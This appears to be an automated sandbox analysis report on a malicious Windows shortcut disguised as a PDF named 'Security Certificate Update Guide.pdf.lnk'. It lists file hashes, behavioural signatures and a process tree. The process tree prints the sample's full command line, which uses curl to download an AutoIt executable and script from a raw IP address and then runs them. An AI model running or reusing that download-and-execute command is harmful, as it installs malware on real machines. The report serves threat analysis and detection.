Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
14/09/2023, 12:33
Static task
static1
Behavioral task
behavioral1
Sample
Security Certificate Critical Update v4321.81178 14 Sept 2023.pdf.lnk
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
Security Certificate Critical Update v4321.81178 14 Sept 2023.pdf.lnk
Resource
win10v2004-20230831-en
Behavioral task
behavioral3
Sample
Security Certificate Critical Update v4321.81178 14 Sept 2023.pdf.lnk
Resource
macos-20230831-en
Behavioral task
behavioral4
Sample
Security Certificate Update Guide.pdf.lnk
Resource
win7-20230831-en
Behavioral task
behavioral5
Sample
Security Certificate Update Guide.pdf.lnk
Resource
win10v2004-20230831-en
Behavioral task
behavioral6
Sample
Security Certificate Update Guide.pdf.lnk
Resource
macos-20230831-en
General
-
Target
Security Certificate Update Guide.pdf.lnk
-
Size
1KB
-
MD5
3fb9fd77754aa0c99c7d7d1a71bc4216
-
SHA1
af30bf87d826912b06b62306864eb0bb5701636e
-
SHA256
aa82b70acc6f8acb4fefa6ca5af6cbd3b33cc18801e2d205c05d182553812309
-
SHA512
f8ac10c231f8ffe9e1e0e7456ba718bca35fa0a0cd1e8dad9d0267549567c6861261e677c1478c62096bfe3371aa4e11bc8f34037e74b97800339f6661002b1d
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2980 wrote to memory of 2748 2980 cmd.exe 29 PID 2980 wrote to memory of 2748 2980 cmd.exe 29 PID 2980 wrote to memory of 2748 2980 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Security Certificate Update Guide.pdf.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k curl -# -o "C:\Users\Admin\AppData\Local\Temp\Autoit3.exe" "http://5.188.87.58:2351" -o "C:\Users\Admin\AppData\Local\Temp\bmyzwoxl.au3" "http://5.188.87.58:2351/msibmyzwoxl" & "C:\Users\Admin\AppData\Local\Temp\Autoit3.exe" "C:\Users\Admin\AppData\Local\Temp\bmyzwoxl.au3" & exit2⤵PID:2748
-